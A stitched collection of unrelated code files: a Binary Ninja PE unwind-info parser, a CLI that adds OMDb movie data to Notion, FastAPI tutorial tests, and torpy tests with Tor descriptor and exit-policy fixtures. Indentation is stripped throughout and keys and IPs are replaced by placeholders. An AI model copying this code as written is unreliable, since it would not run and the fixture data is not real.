RUNTIME_FUNCTION_t = BinjaStruct('<III', names = ('BeginAddress', 'EndAddress', 'UnwindData'))
def read_runtime_function(view, address):
runtime_function, address = RUNTIME_FUNCTION_t.read(view, address, 4)
if runtime_function is not None:
runtime_function['BeginAddress'] += view.start
runtime_function['EndAddress'] += view.start
runtime_function['UnwindData'] += view.start
return runtime_function, address
UNWIND_INFO_t = BinjaStruct('<BBBB', names = ('VersionAndFlags', 'SizeOfProlog', 'CountOfCodes', 'FrameRegisterAndOffset'))
UNW_FLAG_NHANDLER = 0x0
UNW_FLAG_EHANDLER = 0x1
UNW_FLAG_UHANDLER = 0x2
UNW_FLAG_FHANDLER = 0x3
UNW_FLAG_CHAININFO = 0x4
def read_unwind_info(view, address):
unwind_info, address = UNWIND_INFO_t.read(view, address)
if unwind_info is not None:
split_bits(unwind_info, 'VersionAndFlags', [
('Version', 0, 3),
('Flags', 3, 5)
])
split_bits(unwind_info, 'FrameRegisterAndOffset', [
('FrameRegister', 0, 4),
('FrameOffset', 4, 4)
])
if unwind_info['Version'] == 1:
unwind_codes = [ ]
for i in range(unwind_info['CountOfCodes']):
unwind_code, address = read_unwind_code(view, address)
unwind_codes.append(unwind_code)
unwind_info['UnwindCodes'] = unwind_codes
if unwind_info['Flags'] & UNW_FLAG_CHAININFO:
unwind_info['FunctionEntry'], address = read_runtime_function(view, address)
return unwind_info, address
UNWIND_CODE_t = BinjaStruct('<BB', names = ('CodeOffset', 'UnwindOpAndInfo'))
def read_unwind_code(view, address):
unwind_code, address = UNWIND_CODE_t.read(view, address)
if unwind_code is not None:
split_bits(unwind_code, 'UnwindOpAndInfo', [
('UnwindOp', 0, 4),
('OpInfo', 4, 4)
])
return unwind_code, address
def parse_unwind_info(thread, view):
base_address = view.start
pe = read_pe_header(view)
unwind_directory = pe.OPTIONAL_HEADER.DATA_DIRECTORY[3]
unwind_entrys = base_address + unwind_directory.VirtualAddress
unwind_entrys_end = unwind_entrys + unwind_directory.Size
funcs = set()
log.log_info('Exception Data @ 0x{0:X} => 0x{1:X}'.format(unwind_entrys, unwind_entrys_end))
for runtime_address in range(unwind_entrys, unwind_entrys_end, 12):
if thread.cancelled:
break
update_percentage(thread, unwind_entrys, unwind_entrys_end, runtime_address, 'Parsing Unwind Info - Found {0} functions'.format(len(funcs)))
runtime_function, _ = read_runtime_function(view, runtime_address)
if runtime_function is None:
continue
start_address = runtime_function['BeginAddress']
if not view.is_offset_executable(start_address):
continue
if view.get_functions_containing(start_address):
continue
info_address = runtime_function['UnwindData']
unwind_info, _ = read_unwind_info(view, info_address)
if unwind_info is None:
continue
if 'FunctionEntry' in unwind_info:
continue
funcs.add(start_address)
if not thread.cancelled:
thread.progress = 'Creating {0} Function'.format(len(funcs))
log.log_info('Found {0} functions'.format(len(funcs)))
for func in funcs:
view.create_user_function(func)
``` |
{
"source": "0x1za/notflix",
"score": 2
} |
#### File: 0x1za/notflix/app.py
```python
import os
import json
import click
import requests
import inquirer
import sentry_sdk
from absl import logging
from dotenv import load_dotenv
load_dotenv() # take environment variables from .env.
# Code of your application, which uses environment variables (e.g. from `os.environ` or
# `os.getenv`) as if they came from the actual environment.
sentry_sdk.init(
os.getenv("SENTRY_DSN"),
# Set traces_sample_rate to 1.0 to capture 100%
# of transactions for performance monitoring.
# We recommend adjusting this value in production.
traces_sample_rate=1.0)
@click.command()
@click.option("--title",
prompt="Movie title",
help="Movie title to search for.")
def app(title):
"""Simple program that populates your Notion movie database for you and
your significant other.
"""
results = omdb_get_movie(title)
imdb_ids = json_extract(results, "imdbID")
if results["Response"] != "False":
titles = merge_titles(
json_extract(results, "Title"),
json_extract(results, "Year"),
json_extract(results, "Type"),
)
questions = [
inquirer.List(
"movie",
message="Select movie from search results...",
choices=results_tuple(titles, imdb_ids),
),
]
answers = inquirer.prompt(questions)
movie = omdb_get_movie(answers["movie"], by_id=True)
# Check if movie is already in Notion database table.
exists = search_database(movie["imdbID"], "IMDb ID")["results"]
if len(exists) == 0:
create_notion_entry(movie)
elif len(exists) == 1:
logging.warning('Skipping, entry already exists in database.')
else:
logging.fatal(
"Something went wrong... extry might already exist in database"
)
else:
logging.warning("Results list is empty, exiting")
return None
def search_database(query, key):
url = "https://api.notion.com/v1/databases/" + str(
os.getenv("NOTION_DATABASE_ID")) + "/query"
payload = json.dumps(
{"filter": {
"property": str(key),
"text": {
"equals": str(query)
}
}})
headers = {
'Notion-Version': '2021-08-16',
'Authorization': os.getenv("NOTION_INTEGRATION_SECRET_KEY"),
'Content-Type': 'application/json'
}
response = requests.request("POST", url, headers=headers, data=payload)
return response.json()
def create_notion_entry(data):
url = "https://api.notion.com/v1/pages"
payload = json.dumps({
"parent": {
"database_id": os.getenv("NOTION_DATABASE_ID")
},
"properties": {
"title": {
"title": [{
"text": {
"content": "" + str(data["Title"]) + ""
}
}]
},
"IMDb ID": {
"rich_text": [{
"text": {
"content": "" + str(data["imdbID"]) + ""
}
}]
},
"Plot": {
"rich_text": [{
"text": {
"content": "" + str(data["Plot"]) + ""
}
}]
},
"Year": {
"rich_text": [{
"text": {
"content": "" + str(data["Year"]) + ""
}
}]
},
"Run Time": {
"rich_text": [{
"text": {
"content": "" + str(data["Runtime"]) + ""
}
}]
},
"Genre": {
"multi_select":
generate_multi_select(data["Genre"].split(", "))
},
"Cast": {
"multi_select":
generate_multi_select(data["Actors"].split(", "))
},
"Star Rating": {
"select": {
"name": score_to_stars(data["imdbRating"])
}
}
}
})
headers = {
'Notion-Version': '2021-08-16',
'Authorization': os.getenv("NOTION_INTEGRATION_SECRET_KEY"),
'Content-Type': 'application/json'
}
response = requests.request("POST", url, headers=headers, data=payload)
return response.status_code
def score_to_stars(score):
# Score based on IMDb rating system.
stars = None
if score != "N/A":
score = float(
score
) / 2 # Divide score, IMDb rating is out of 10, convert to 5 stars
if min(0, 1) < score < max(0, 1):
stars = "⭐"
elif min(1, 2) < score < max(1, 2):
stars = "⭐⭐"
elif min(2, 3.1) < score < max(2, 3.1):
stars = "⭐⭐⭐"
elif min(3, 4) < score < max(3, 4):
stars = "⭐⭐⭐⭐"
elif min(4, 5) < score < max(4, 5):
stars = "⭐⭐⭐⭐⭐"
else:
stars = score
return stars
def results_tuple(titles, ids):
results = []
for idx, item in enumerate(titles):
results.append((item, ids[idx]))
return results
def merge_titles(titles, years, types):
results = []
for idx, item in enumerate(titles):
results.append(item + " (" + str(years[idx]) + ") - " +
str(types[idx]))
return results
def generate_multi_select(array):
result = []
for item in array:
result.append({"name": str(item)})
return result
def json_extract(obj, key):
"""Recursively fetch values from nested JSON."""
arr = []
def extract(obj, arr, key):
"""Recursively search for values of key in JSON tree."""
if isinstance(obj, dict):
for k, v in obj.items():
if isinstance(v, (dict, list)):
extract(v, arr, key)
elif k == key:
arr.append(v)
elif isinstance(obj, list):
for item in obj:
extract(item, arr, key)
return arr
values = extract(obj, arr, key)
return values
def omdb_get_movie(query, by_id=False):
if by_id is False:
param = "s"
else:
param = "i"
url = ("https://www.omdbapi.com/?apikey=" + str(os.getenv("OMDB_KEY")) +
"&" + str(param) + "=" + str(query))
payload = {}
headers = {}
response = requests.request("GET", url, headers=headers, data=payload)
return response.json()
if __name__ == "__main__":
app()
``` |
{
"source": "0x20bf-org/fastapi",
"score": 2
} |
#### File: test_tutorial/test_body_multiple_params/test_tutorial001.py
```python
import pytest
from docs_src.body_multiple_params.tutorial001 import app
from fastapi.testclient import TestClient
client = TestClient(app)
openapi_schema = {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/items/{item_id}": {
"put": {
"responses": {
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"summary": "Update Item",
"operationId": "update_item_items__item_id__put",
"parameters": [
{
"required": True,
"schema": {
"title": "The ID of the item to get",
"maximum": 1000.0,
"minimum": 0.0,
"type": "integer",
},
"name": "item_id",
"in": "path",
},
{
"required": False,
"schema": {"title": "Q", "type": "string"},
"name": "q",
"in": "query",
},
],
"requestBody": {
"content": {
"application/json": {
"schema": {"$ref": "#/components/schemas/Item"}
}
}
},
}
}
},
"components": {
"schemas": {
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
"description": {"title": "Description", "type": "string"},
"tax": {"title": "Tax", "type": "number"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {"type": "string"},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
def test_openapi_schema():
response = client.get("/openapi.json")
assert response.status_code == 200, response.text
assert response.json() == openapi_schema
item_id_not_int = {
"detail": [
{
"loc": ["path", "item_id"],
"msg": "value is not a valid integer",
"type": "type_error.integer",
}
]
}
@pytest.mark.parametrize(
"path,body,expected_status,expected_response",
[
(
"/items/5?q=bar",
{"name": "Foo", "price": 50.5},
200,
{
"item_id": 5,
"item": {
"name": "Foo",
"price": 50.5,
"description": None,
"tax": None,
},
"q": "bar",
},
),
("/items/5?q=bar", None, 200, {"item_id": 5, "q": "bar"}),
("/items/5", None, 200, {"item_id": 5}),
("/items/foo", None, 422, item_id_not_int),
],
)
def test_post_body(path, body, expected_status, expected_response):
response = client.put(path, json=body)
assert response.status_code == expected_status
assert response.json() == expected_response
```
#### File: test_tutorial/test_metadata/test_tutorial001.py
```python
from docs_src.metadata.tutorial001 import app
from fastapi.testclient import TestClient
client = TestClient(app)
openapi_schema = {
"openapi": "3.0.2",
"info": {
"title": "ChimichangApp",
"description": "\nChimichangApp API helps you do awesome stuff. 🚀\n\n## Items\n\nYou can **read items**.\n\n## Users\n\nYou will be able to:\n\n* **Create users** (_not implemented_).\n* **Read users** (_not implemented_).\n",
"termsOfService": "http://example.com/terms/",
"contact": {
"name": "<NAME>",
"url": "http://x-force.example.com/contact/",
"email": "<EMAIL>",
},
"license": {
"name": "Apache 2.0",
"url": "https://www.apache.org/licenses/LICENSE-2.0.html",
},
"version": "0.0.1",
},
"paths": {
"/items/": {
"get": {
"summary": "Read Items",
"operationId": "read_items_items__get",
"responses": {
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
}
},
}
}
},
}
def test_openapi_schema():
response = client.get("/openapi.json")
assert response.status_code == 200, response.text
assert response.json() == openapi_schema
def test_items():
response = client.get("/items/")
assert response.status_code == 200, response.text
assert response.json() == [{"name": "Katana"}]
``` |
{
"source": "0x20bf-org/tor",
"score": 2
} |
#### File: tests/unittest/test_parsers.py
```python
import pytest
from torpy.parsers import HSDescriptorParser, IntroPointParser, RouterDescriptorParser
@pytest.fixture
def hs_example():
return """rendezvous-service-descriptor aj7trvc2tuggkzsffrbla3qogs2plltf
version 2
permanent-key
-----BEGIN RSA PUBLIC KEY-----
<KEY>
-----END RSA PUBLIC KEY-----
secret-id-part jrhhuswdnmpplrlflxc4buquuzijljkr
publication-time 2019-03-20 06:00:00
protocol-versions 2,3
introduction-points
-----BEGIN MESSAGE-----
aW<KEY>aW9uLXBvaW50IGt4eGlxenU2YnI0cGg1ZmgybzN1eHh3ZnNjaGpy
a282CmlwLWFkZHJlc3MgMjE3LjIzLjcuMTAzCm9uaW9uLXBvcnQgOTAwMQpvbmlv
bi1rZXkKLS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JR0pBb0dCQU9E
dG9TajZreUh6WHN4enhwVDgvOGFpV2hCcmVMdGFMbjZybGJhRjUwRnVQWkY5azVG
ZGhnMDAKNjFWbHc1djUzVHlWTFJST042Mkt5TlJZT1o5NWd1V2FEajBDVDBMbCtE
Qzh5OU5ORk83Zk02SG1hR1pkYTlnYwpxYkRtK2JET1JTSHVmd2FzWTNSVHlEVW5H
TWFpSXpxeDJna0l4dEI1TituTkk4eERDVFlEQWdNQkFBRT0KLS0tLS1FTkQgUlNB
IFBVQkxJQyBLRVktLS0tLQpzZXJ2aWNlLWtleQotLS0tLUJFR0lOIFJTQSBQVUJM
SUMgS0VZLS0tLS0KTUlHSkFvR0JBTGNHRGZzcVBObzNKcFpIMjVMcnd4bDNGeWZt
VExKUGdtRUh5KzcvcUJ0eVlBTEp1cC9McGRxcQpRcjkraTBpcFdLcWs3cG5TUi9w
aFo4S3pnR1lnVGJWUDZyV2NGQXZvWEhQWXVmc1d6OVp2SGY3N0drYVZZSTJSCkVq
TEtaL1FMRG9rYVFKOFpHeWNpUnJ3ZHlRdHMyTUxZc00rRUQ3bmhHZzdtR2N2eWZC
SWZBZ01CQUFFPQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCmludHJvZHVj
dGlvbi1wb2ludCB5bjN4NG9scTdsYm1ic3ptanlsZ29ybmhvemliZ2V5ZQppcC1h
ZGRyZXNzIDk0LjIzLjE1MC44MQpvbmlvbi1wb3J0IDQ0Mwpvbmlvbi1rZXkKLS0t
LS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JR0pBb0dCQU94ajNzT2syb3g3
dzU5aXdhejl6WHc2UktvdjJXYUh6TWVvbjBiWlVVQXVHcWlKT01ONEt3RkQKMlNS
LzBrSUY1UjIyV3I4a2x0cXQxbWlTY0tvWk9KU2MrYXVVVjR6TXl2NmE5bnl2cXJt
amhDYWJqSlFoQ0M4VQpoT3ZrL2N3K1MvZHZnQXFGTkdnTzNHV0RrSnI3bC9BTXh5
alhVa1FKYnVjb1JiWGkwbU56QWdNQkFBRT0KLS0tLS1FTkQgUlNBIFBVQkxJQyBL
RVktLS0tLQpzZXJ2aWNlLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0t
LS0KTUlHSkFvR0JBTVJDYWJHdWI3Mk1xSndqMHJXRnArZW5xSzRzMVBEeGZUVDUx
Zmcwdkd0bStxM1E0azFtUm1tVApiNkc3OTNNOVV6WnN4dVNKbDRSOVJyZEJaM1pt
OGRmMDU2cEUvSmJ0Q2NWVnlPb0daZlVsWHhXaDM0c2RZdU4xCkZGb1Iva0JlLzBF
aWtBSWI5eGsyS001SjlKMGEyc1A0UTNhL2NGOWJkNjhpMWlaSmIySWhBZ01CQUFF
PQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCmludHJvZHVjdGlvbi1wb2lu
dCBoemo1aGY0NXdiN3AyNDNnbWhldGppbzYyZmFzcG51ZQppcC1hZGRyZXNzIDIx
Ny43OS4xNzkuMTc3Cm9uaW9uLXBvcnQgOTAwMQpvbmlvbi1rZXkKLS0tLS1CRUdJ
TiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JR0pBb0dCQU5xY2R0YTQvOUFFYzkyMjJx
YUVnVTNSQ1E0ZEVGTnlDSDNDbTVTNGFDa2dxbHp0VmJPSlBlVmQKVjJaTjk4dW8x
OGlXa3JySENiZUdTWTVqdkkvdTFlUzFydTNNTkM1NTBhNDE3RHdFUGlaUWJxMitO
N1dGYisxbwpOa2x2TkllZTZGMDllb2FYMExuVGJjR1RheGJLaHF0cWh4cGJvYTVJ
RUV0L05CajRmNE05QWdNQkFBRT0KLS0tLS1FTkQgUlNBIFBVQkxJQyBLRVktLS0t
LQpzZXJ2aWNlLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0tLS0KTUlH
SkFvR0JBTzZzbjNzekJXVGxjQVAvV1lIQ2ZzVmVnSDBPNmNlcHlWRVllOW82YzQ4
cGh6VDBoZzFnWmJMdApOS3lqM2xWR1RaYVFxY3Jvak16bzhlbkEwR2VyeGsrWVpF
THV3eDRCYmIraUk5d1gvbmJib3ptejhLZjhNdnVGCmNkakFDalEwV3liVXBtcWdk
TXBpVHc4SFNSbWh0SWlsQXE1L1VnYzNTaVRQbHlqWVYxN1BBZ01CQUFFPQotLS0t
LUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCgo=
-----END MESSAGE-----
signature
-----BEGIN SIGNATURE-----
XkVVwRd1reFUb0KqdtYUWcLUCQduq7GnGJ8IpNYbsI4x8LadiRi9gxABv8E4OjYQ
5CiP6qso+<KEY>
NwjHDSI4mD57pkSzvPgd+t/hrA3AFAWZu49eUw4BYwc=
-----END SIGNATURE-----
"""
hs_example2 = """HTTP/1.0 200 OK
Date: Wed, 20 Mar 2019 21:17:16 GMT
Content-Type: text/plain
X-Your-Address-Is: 192.168.127.12
Content-Encoding: identity
Content-Length: 3253
Pragma: no-cache
rendezvous-service-descriptor expocwozpjpjce7kfcdyu3et25aswqdf
version 2
permanent-key
-----BEGIN RSA PUBLIC KEY-----
<KEY>
-----END RSA PUBLIC KEY-----
secret-id-part 2o5f46v3wjaoysjde3z2tjkax5unwp4z
publication-time 2019-03-20 21:00:00
protocol-versions 2,3
introduction-points
-----BEGIN MESSAGE-----
<KEY>
"""
def test_hs_parser(hs_example):
res = HSDescriptorParser.parse(hs_example)
print(res)
@pytest.fixture
def ip_example():
return """introduction-point ysnbo5iqzktfhwthe67q4b73p5lkb4e5
ip-address 192.168.3.11
onion-port 9001
onion-key
-----<KEY>-----
service-key
-----<KEY>-----
introduction-point fk64ywrgk3g6dx3accjlzjqmore7pwkw
ip-address 192.168.3.11
onion-port 443
onion-key
-----<KEY>
-----END RSA PUBLIC KEY-----
service-key
-----BEGIN RSA PUBLIC KEY-----
MIGJAoGBANw4LrTMxv1lXQp2XgKXUklE/KgdHB3bSQ+f8FzIIEat+ndVvTuq4ILp
PngUxqTS8ulc0ZMJ+kLezLBzYupVZy+c4Lhc9SCROTtz93yoO45NPtcszKaNO1+K
kf95gp5BHvuC51OD4UGJOgaQzusRjrbfDc2KB2D5g+scok86qgShAgMBAAE=
-----END RSA PUBLIC KEY-----
introduction-point 3ugi53c4uqbkt6sepdyqymneid3r62ef
ip-address 192.168.127.12
onion-port 143
onion-key
-----BEGIN RSA PUBLIC <KEY>
-----END RSA PUBLIC KEY-----
service-key
-----BEGIN RSA PUBLIC <KEY>
-----END RSA PUBLIC KEY-----
"""
def test_ip_parser(ip_example):
res = IntroPointParser.parse(ip_example)
print(res)
@pytest.fixture
def rd_example():
return """router Nyx 192.168.3.11 9001 0 9030
identity-ed25519
-----BEGIN ED25519 CERT-----
<KEY>
-----END ED25519 CERT-----
master-key-ed25519 rjfGh82j0kKpEWYvZ1O/aDSk/3taUrAcPLtGHhxekn0
platform Tor 0.3.5.8 on Linux
proto Cons=1-2 Desc=1-2 DirCache=1-2 HSDir=1-2 HSIntro=3-4 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Relay=1-2
published 2019-03-31 11:43:32
fingerprint 8532 DE42 43E4 949E 4EA8 6E88 CDCA 6821 582F 1A13
uptime 2840486
bandwidth 1073741824 1073741824 24702282
extra-info-digest FFDAB70266F42AE8938EC1C0E6DC1A275DD903FE bCEVMfYHbSxL6Th0iJj0Wo8HZrzLnyqDvlheyO1JzNE
onion-key
-----<KEY>
-----END RSA PUBLIC KEY-----
signing-key
-----BEGIN RSA PUBLIC <KEY>
-----END RSA PUBLIC KEY-----
onion-key-crosscert
-----BEGIN CROSSCERT-----
<KEY>
-----END CROSSCERT-----
ntor-onion-key-crosscert 1
-----BEGIN ED25519 CERT-----
<KEY>7Rh4cXpJ9APezxMtt8tMB
tpDMZnC+Hq9pK62Yu6Na3H+T0+fdme8CmhXa9pQ8NgCpeW7Es9oNXaCev8BcMol/
6AFJ3vFidAI=
-----END ED25519 CERT-----
family $13E8EB1D9FD7470AA87A47DC93538E88340A0903 $157106182B9F33663CAEDCD883D302316331DE5E $2C5FDD910AE3E21C0B6F9DD4BF397F570C8358FA $3844DFD3446832A3C8A137EEA616D4EEB370C788 $42E0FB190D20522C6C8C71E42B71DA33AC7A780E $4DDBC57BA2A63F0439FD41D92BFF8E141CC61213 $54FA84FF74B0C2BAC45CEADB4BF9C9CAEF72020F $67469C0671BF8D4BECB11F006AD541E9BC54EBCB $69D22FAEE5D4E18A098D5DEF68EAEE8D24F53CCA $70A81E423F94A9BF58D2FF432BBF59FA73426DB6 $8154154C636EC317C7165FD839F34F79963376C1 $88C3708A9D71ECEC1910B63C3FAA5BF60CD7E199 $8C34A154997812D1396BC462A42DA0A59B55952D $AEA760EE120B630262C70C1C11D4158BBF12C602 $B5EDD091D81655C2EBADB38065A868AA20259AC3 $B756D7123D759EAB62CB6A09148AD65AC216F3E3 $C79517FFC1327B0D4E86218A34C8E2570F338CF9 $C8850DE0EBC07481808F32F2BAA76CA65CB659FB $CE946DFEC40A1BFC3665A4727F54354F57297497
hidden-service-dir
contact abuse [AT] torworld.org - BTC 34yFiqwbcUA5MYSvUcpjqARvhoTwMFjmPs
ntor-onion-key owtGGV469gdDNIWfnIlIHgR7CvM0Ak5VwLiZCtBgtzc=
reject 0.0.0.0/8:*
reject 169.254.0.0/16:*
reject 127.0.0.0/8:*
reject 192.168.0.0/16:*
reject 10.0.0.0/8:*
reject 172.16.0.0/12:*
reject 192.168.3.11:*
reject 172.16.31.10/18:*
reject 192.168.3.11/24:*
reject 192.168.127.12/24:*
reject 37.139.49.0/24:*
reject 172.16.58.3/24:*
reject 192.168.127.12/24:*
reject 172.16.31.10/24:*
reject 192.168.3.11/24:*
reject 172.16.17.32/24:*
reject 172.16.31.10/24:*
reject 192.168.3.11/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 192.168.127.12/24:*
reject 192.168.127.12/24:*
reject 192.168.127.12/24:*
reject 172.16.17.32/24:*
reject 192.168.3.11/24:*
reject 172.16.58.3/24:*
reject 192.168.127.12/21:*
reject 172.16.31.10/24:*
reject 172.16.31.10/13:*
reject 192.168.3.11/16:*
reject 192.168.127.12/16:*
reject 172.16.31.10/24:*
reject 192.168.127.12/24:*
reject 172.16.31.10/24:*
reject 192.168.3.11/24:*
reject 192.168.127.12/28:*
reject 172.16.31.10/24:*
reject 192.168.3.11/24:*
reject 172.16.17.32/22:*
reject 172.16.17.32/24:*
reject 192.168.3.11/24:*
reject 192.168.3.11/24:*
reject 172.16.17.32/24:*
reject 192.168.3.11/22:*
reject 172.16.17.32/24:*
reject 172.16.31.10/24:*
reject 172.16.31.10/24:*
reject 172.16.17.32/24:*
reject 172.16.58.3/23:*
reject 172.16.17.32/24:*
reject 172.16.58.3/24:*
reject 192.168.127.12/24:*
reject 172.16.58.3/23:*
reject 172.16.58.3/22:*
reject 172.16.31.10/22:*
reject 172.16.31.10/23:*
reject 192.168.3.11/24:*
reject 192.168.127.12/23:*
reject 192.168.127.12/24:*
reject 172.16.58.3/24:*
reject 192.168.127.12/24:*
reject 172.16.17.32/24:*
reject 192.168.127.12/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 172.16.31.10/24:*
reject 192.168.127.12/24:*
reject 192.168.127.12/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/24:*
reject 192.168.3.11/24:*
reject 192.168.3.11/22:*
reject 192.168.127.12/22:*
reject 172.16.17.32/19:*
reject 192.168.127.12/24:*
reject 192.168.3.11/24:*
reject 172.16.17.32/24:*
reject 172.16.17.32/24:*
reject 172.16.58.3/24:*
reject 192.168.127.12/24:*
reject 192.168.3.11/24:*
reject 192.168.127.12/24:*
reject 192.168.3.11/24:*
reject 172.16.58.3/24:*
reject 172.16.58.3/22:*
reject 172.16.31.10/20:*
reject 172.16.17.32/16:*
reject 172.16.17.32/17:*
reject 192.168.3.11/20:*
reject 172.16.17.32/22:*
reject 192.168.127.12/24:*
reject 192.168.127.12/20:*
reject 172.16.17.32/24:*
reject 172.16.17.32/24:*
reject 192.168.3.11/24:*
reject 172.16.31.10/24:*
reject 172.16.17.32/23:*
reject 172.16.17.32/24:*
reject 172.16.31.10/24:*
reject 172.16.58.3/24:*
reject 172.16.31.10/24:*
reject 192.168.127.12/23:*
reject 172.16.58.3/23:*
reject 192.168.127.12/24:*
reject 172.16.17.32/24:*
reject 172.16.17.32/24:*
reject 172.16.58.3/24:*
reject 172.16.17.32/22:*
reject 192.168.3.11/23:*
reject 192.168.127.12/24:*
reject 192.168.127.12/24:*
reject 172.16.58.3/24:*
reject 172.16.17.32/24:*
reject 172.16.17.32/22:*
reject 192.168.3.11/22:*
reject 172.16.17.32/22:*
reject 172.16.17.32/22:*
reject 192.168.127.12/24:*
reject 172.16.58.3/22:*
reject 172.16.31.10/24:*
reject 172.16.17.32/24:*
reject 172.16.31.10/24:*
reject 192.168.3.11/24:*
reject 172.16.31.10/24:*
reject 192.168.127.12/24:*
reject 172.16.17.32/24:*
reject 192.168.127.12/24:*
reject 172.16.31.10/24:*
reject 172.16.31.10/24:*
reject 172.16.31.10/23:*
reject 172.16.31.10/24:*
reject 172.16.17.32/24:*
reject 172.16.17.32/24:*
reject 172.16.58.3/22:*
reject 172.16.31.10/24:*
reject 172.16.17.32/24:*
reject 172.16.17.32/24:*
reject 192.168.3.11/24:*
reject 192.168.127.12/24:*
reject 192.168.127.12/23:*
reject 192.168.3.11/22:*
reject 172.16.17.32/20:*
reject 172.16.31.10/24:*
reject 172.16.58.3/23:*
reject 192.168.127.12/18:*
reject 68.119.232.0/21:*
reject 192.168.3.11/16:*
reject 192.168.127.12/14:*
reject 172.16.58.3/16:*
reject 172.16.17.32/15:*
reject 172.16.31.10/24:*
reject 192.168.127.12/24:*
reject 192.168.3.11/21:*
reject 192.168.127.12/24:*
reject 192.168.127.12/24:*
reject 172.16.31.10/24:*
reject 192.168.127.12/24:*
reject 192.168.127.12/24:*
reject 172.16.31.10/24:*
reject 172.16.58.3/24:*
reject 192.168.3.11/24:*
reject 192.168.127.12/24:*
reject 172.16.17.32/24:*
reject 192.168.127.12/22:*
reject 172.16.58.3/24:*
reject 192.168.3.11/24:*
reject 172.16.31.10/24:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 192.168.3.11:*
reject 192.168.3.11:*
reject 192.168.127.12:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.3.11:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 172.16.31.10:*
reject 172.16.17.32:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 192.168.127.12:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 172.16.31.10:*
reject 172.16.58.3:*
reject 192.168.127.12:*
reject 172.16.17.32:*
reject 172.16.58.3:*
reject 172.16.17.32:*
reject 192.168.127.12:*
